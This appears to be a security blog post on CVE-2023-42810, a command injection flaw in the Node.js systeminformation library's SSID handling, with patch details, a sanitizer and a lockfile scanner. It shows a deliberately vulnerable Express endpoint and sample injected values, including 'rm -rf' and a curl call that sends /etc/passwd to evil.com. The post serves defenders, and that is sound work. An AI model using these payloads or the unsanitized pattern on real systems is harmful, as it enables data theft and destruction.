CVE-2023-42810 highlights a critical command injection vulnerability in the popular Node.js library, systeminformation, that could allow attackers to execute arbitrary commands through SSID parameters. If you use systeminformation to gather WiFi data in your Node apps and do not properly sanitize inputs, your server could be at risk.

This post covers what happened, who’s at risk, how the exploit works, how it was fixed, and suggestions to secure your apps.

Background: What is systeminformation?

systeminformation is a handy Node.js library providing detailed system statistics and hardware information. It’s widely adopted, boasting over 10 million downloads per month. Its functions can query CPU, memory, disk, battery, WiFi networks, and more from various operating systems.

wifiNetworks(): Lists all available WiFi networks.

These functions ask the underlying OS for info, and sometimes pass user-supplied parameters to command-line tools.

What is CVE-2023-42810?

The NVD entry for CVE-2023-42810 describes a command injection vulnerability affecting versions 5.. through 5.21.6 of systeminformation. Specifically, if a user-provided string (such as an SSID) was passed to wifiConnections() or wifiNetworks(), an attacker could inject shell commands, potentially gaining access, changing configurations, or running malicious code on the server.

Why does this happen?

Older versions of systeminformation did not verify or sanitize the SSID strings before passing them to underlying OS commands. If the SSID value included malicious shell code, it got directly executed.

For example, imagine:

```js
const si = require('systeminformation');

const ssid = userInput; // Maybe from a web form
si.wifiConnections(ssid).then(res => {
  console.log(res);
});
```

If userInput is a string such as

```
mySSID; rm -rf /important-data
```

the shell would also run rm -rf /important-data on your server!

Exploit Details

Let’s dive a little deeper into how attackers could leverage this flaw.

Suppose an app lets users list WiFi networks by giving an SSID filter. If the app code looks like:

```js
const express = require('express');
const si = require('systeminformation');

const app = express();
app.use(express.json()); // parse JSON bodies so req.body.ssid is populated

// Vulnerable: the SSID reaches the library without any validation
app.post('/checkwifi', (req, res) => {
  const ssid = req.body.ssid; // User supplies SSID
  si.wifiNetworks(ssid)
    .then(networks => res.json(networks))
    .catch(err => res.status(500).send(err));
});
```

An attacker sets:

```
ssid = mynetwork; curl http://evil.com/$(cat /etc/passwd)
```

Under the hood, systeminformation might build a command like:

```
iwlist wlan scan essid mynetwork; curl http://evil.com/$(cat /etc/passwd)
```

The shell runs both the intended command and the attacker’s curl call, leaking sensitive server data.

> Even if your app doesn’t *seem* to let users pass SSID strings, any third-party code using systeminformation could be at risk if they take unsanitized input.

Fix: How It Was Resolved

The fix was introduced in version 5.21.7, which added stricter input validation. Now, non-string or suspicious parameter values are rejected, blocking any injected shell code.

Patch PR #859 shows the new parameter checks.

Key change

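```js
const { execSync } = require('child_process');

// Before: No sanitization, ssid is interpolated straight into the shell command
execSync(`iwlist... essid ${ssid}`);

// After: Basic sanitization, allowlist check before the command is built
if (typeof ssid === 'string' && /^[a-zA-Z0-9_.-]+$/.test(ssid)) {
  execSync(`iwlist... essid "${ssid}"`);
} else {
  throw new Error('Invalid SSID');
}
```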

Now, only SSIDs made up of alphanumeric characters, underscores, dots, and hyphens (the usual set) are accepted.

Workarounds: Secure Your Code — Even Without Updating

Upgrade as soon as possible to systeminformation 5.21.7 or later! If you’re unable to upgrade immediately, always sanitize and validate input passed to these functions.

Sanitize Example

```js
function secureSSID(ssid) {
  // Only allow alphanumeric and common WiFi SSID chars
  return typeof ssid === 'string' && /^[a-zA-Z0-9_.-]+$/.test(ssid);
}

// Usage (inside a request handler, where res is the HTTP response)
if (secureSSID(userSSID)) {
  si.wifiNetworks(userSSID)
    .then(networks => res.json(networks))
    .catch(err => res.status(500).send(err));
} else {
  // Reject
  res.status(400).send('Invalid SSID');
}
```

> Never trust user input — check/clean every string, especially those destined for a system command.
>
> Be cautious of third-party dependencies and modules that take parameters to systeminformation.
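
To act on the upgrade advice and the warning about third-party dependencies, the following added example (not code from the original post or the systeminformation project) scans an npm lockfile for installed copies of systeminformation below 5.21.7, including copies nested under other packages. The sample lockfile and the package name wifi-helper are constructed for illustration, and the check assumes the lockfileVersion 2/3 layout with a "packages" map.

```javascript
// Added example: find vulnerable systeminformation copies in an npm lockfile
// (lockfileVersion 2/3 "packages" map), including nested transitive copies.
const FIXED = [5, 21, 7]; // first fixed release named in this post

function parseVersion(v) {
  // Read the leading x.y.z and ignore any pre-release or build suffix.
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? m.slice(1).map(Number) : null;
}

function isAffected(version) {
  const v = parseVersion(version);
  if (!v) return true; // unparseable version: flag for manual review
  if (v[0] !== FIXED[0]) return false; // the post covers the 5.x line only
  for (let i = 1; i < 3; i++) {
    if (v[i] !== FIXED[i]) return v[i] < FIXED[i];
  }
  return false; // exactly 5.21.7
}

function findAffected(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    // Match the package at any nesting depth, not only the top level.
    if (!/(^|\/)node_modules\/systeminformation$/.test(path)) continue;
    if (!isAffected(meta.version)) continue;
    // The parent path shows which dependency pulled this copy in.
    const parent = path.replace(/\/?node_modules\/systeminformation$/, '');
    hits.push({ path, version: meta.version, pulledInBy: parent || '(root)' });
  }
  return hits;
}

// Constructed lockfile fragment; "wifi-helper" is a hypothetical package.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app' },
    'node_modules/systeminformation': { version: '5.21.8' },
    'node_modules/wifi-helper': { version: '1.0.0' },
    'node_modules/wifi-helper/node_modules/systeminformation': { version: '5.21.6' },
  },
};

console.log(findAffected(sampleLock));
```

For a real project, pass the parsed contents of package-lock.json to findAffected and review every entry it returns.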

References

- CVE-2023-42810 on NVD
- systeminformation Issue #879
- systeminformation Release 5.21.7
- systeminformation Source
- PR #859: Fix Parameter Checks

Conclusion

CVE-2023-42810 is a wake-up call: even trusted libraries can have simple, devastating bugs if inputs are not sanitized. If you use systeminformation below 5.21.7 and ever pass user-sourced SSID strings to wifiConnections() or wifiNetworks(), upgrade and add strong input checking immediately.

Stay safe:

Audit code paths that touch the shell

If you want more details or need help patching your environment, check the official GitHub links or reach out to experienced Node.js security professionals.

Timeline

Published on: 09/21/2023 18:15:12 UTC
Last modified on: 09/23/2023 03:38:14 UTC